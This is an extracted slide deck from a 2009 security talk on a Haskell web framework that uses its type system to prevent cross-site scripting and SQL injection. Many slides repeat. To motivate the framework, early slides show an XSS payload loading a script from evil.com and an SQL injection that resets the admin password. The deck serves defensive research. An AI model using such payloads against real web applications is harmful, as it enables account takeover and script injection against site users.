Post on 09-Mar-2018
Static Enforcement of WebApplication Integrity
William Robertson and Giovanni Vigna{wkr,vigna}@cs.ucsb.edu
Computer Security GroupUC Santa Barbara
13 August 2009
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 1 / 28
Web applications are...
I easy to develop
I easy to deploy
I easy to update
I accessible from everywhere
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 2 / 28
Web applications are...
I easy to develop
I easy to deploy
I easy to update
I accessible from everywhere
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 2 / 28
Web applications are...
I easy to develop
I easy to deploy
I easy to update
I accessible from everywhere
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 2 / 28
Web applications are...
I easy to develop
I easy to deploy
I easy to update
I accessible from everywhere
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 2 / 28
...and broken
FAA Review of Web Applications Security and Intrusion Detection in Air Traffic Control SystemsReport Number: FI-2009-049
Date Issued: May 4, 2009
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 3 / 28
...and broken
FAA Review of Web Applications Security and Intrusion Detection in Air Traffic Control SystemsReport Number: FI-2009-049
Date Issued: May 4, 2009
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 3 / 28
Cross-site scripting
<input type="hidden" name="m" value="$var"/>
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 5 / 28
Cross-site scripting
<input type="hidden" name="m" value="x"/>
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 5 / 28
Cross-site scripting
<input type="hidden" name="m" value="x"/>
<script src="http://evil.com/x.js">
</script>
<span id="x"/>
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 5 / 28
SQL injection
UPDATE users SET passwd=’$var’
WHERE login=’user’
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 6 / 28
SQL injection
UPDATE users SET passwd=’l33r0y’
WHERE login=’user’
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 6 / 28
SQL injection
UPDATE users SET passwd=’l33r0y’
WHERE login=’admin’--’ WHERE login=’user’
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 6 / 28
Existing solutions
I Web application firewalls
I Automated static, dynamic analyses
I Penetration testing and code auditing
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 7 / 28
Why are web apps vulnerable?
I Web documents and database queries treated asunstructured character sequences
I No knowledge of structure and content at theframework level
I Developers responsible for manually sanitizingcontent
I Failure to preserve integrity of document anddatabase query structure
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 8 / 28
A language-based solution
I Explicitly denote structure and content withinlanguage using the type system
I Language is responsible for preserving applicationintegrity
I Lift burden as much as possible from the developerI No testing, separate analyses, policy specifications
I Web application compiles → application is safe
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 9 / 28
Framework overview
I Haskell-based application framework prototype
I Application implemented as set of functionsexecuting within the App monad stack
I HTTP requests routed to functions
I Functions perform computations and returndocuments
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 10 / 28
Documents
Document
DocHead DocBody
TitleNode LinkNode DivNode
AnchorNode
TextNode
DivNode
TextNode
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 11 / 28
Document nodes
data Node = TextNode {nodeText :: String
} | AnchorNode {anchorAttrs :: NodeAttrs,
anchorHref :: Maybe Url,
...
anchorNodes :: [Node]
} | DivNode {divAttrs :: NodeAttrs,
divNodes :: [Node]
} ...
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 12 / 28
Document nodes
data Node = TextNode {nodeText :: String
} | AnchorNode {anchorAttrs :: NodeAttrs,
anchorHref :: Maybe Url,
...
anchorNodes :: [Node]
} | DivNode {divAttrs :: NodeAttrs,
divNodes :: [Node]
} ...
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 12 / 28
Document nodes
data Node = TextNode {nodeText :: String
} | AnchorNode {anchorAttrs :: NodeAttrs,
anchorHref :: Maybe Url,
...
anchorNodes :: [Node]
} | DivNode {divAttrs :: NodeAttrs,
divNodes :: [Node]
} ...
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 12 / 28
Document nodes
data Node = TextNode {nodeText :: String
} | AnchorNode {anchorAttrs :: NodeAttrs,
anchorHref :: Maybe Url,
...
anchorNodes :: [Node]
} | DivNode {divAttrs :: NodeAttrs,
divNodes :: [Node]
} ...
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 12 / 28
Enforcing document integrity
I Type system restricts applications to constructingDocument trees
I f :: HttpRequest -> App Document
I Framework is responsible for rendering tree into text
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 13 / 28
Document rendering
Document
DocHead DocBody
TitleNode LinkNode DivNode
AnchorNode
TextNode
DivNode
TextNode
<html><head><title>...</title></head><body><div><a href="...">...</a></div>...<div></div></body></html>
Web Application Framework
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 14 / 28
Node sanitization
class Render a where
render :: a -> String
I Nodes implement Render typeclass
I render sanitizes data given context
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 15 / 28
Database queries
UPDATE users SET passwd=? WHERE login=?
I Mechanism already exists to fix query structure –prepared statements
I App monad controls access to database functions
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 16 / 28
Database queries
UPDATE users SET passwd=? WHERE login=?
I Mechanism already exists to fix query structure –prepared statements
I App monad controls access to database functions
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 16 / 28
Enforcing static query integrity
IO
AppIO
AppState
AppConfig
Application
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 17 / 28
Not all queries are static
SELECT * FROM users WHERE login IN (’admin’)
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 18 / 28
Not all queries are static
SELECT * FROM users WHERE login IN (’admin’,
’devel’)
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 18 / 28
Not all queries are static
SELECT * FROM users WHERE login IN (’admin’,
’devel’,
’test’)
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 18 / 28
Enforcing dynamic query integrity
SELECT
["*"] ["users"] IN
"login" SET
"admin" "test""devel"
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 19 / 28
Sanitization evaluation
I Performed control flow analysis of framework toevaluate coverage of sanitization functions
I Evaluated correctness of individual sanitizationfunctions
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 20 / 28
Sanitization function coverage
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 21 / 28
Sanitization function correctness
I Test-driven approach to check correctness
I Number of invariants manually specified
I 1,000,000 random test cases generated usingQuickCheck
I Test cases for malicious examples
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 22 / 28
Sanitization function invariants
propAttrValueSafe :: AttrValue -> Bool
propAttrValueSafe input =
(not $ elem ’<’ output) &&
(not $ elem ’>’ output) &&
(not $ elem ’&’ $ stripEntities output) &&
(not $ elem ’"’ output) where
output = render input
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 23 / 28
Performance
I Implemented web application using threeframeworks
I Haskell
I Pylons
I Tomcat
I Evaluated throughput and latency
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 24 / 28
Conclusions
I XSS and SQL injection stem from failure to enforceintegrity of documents and database queries
I Type system allows framework to automaticallyprevent introduction of server-side vulnerabilities
I Prototype framework is effective at preventingexploitation
I Reasonable latency and throughput performance
(UCSB SecLab) Static Web App Integrity Enforcement 13 August 2009 27 / 28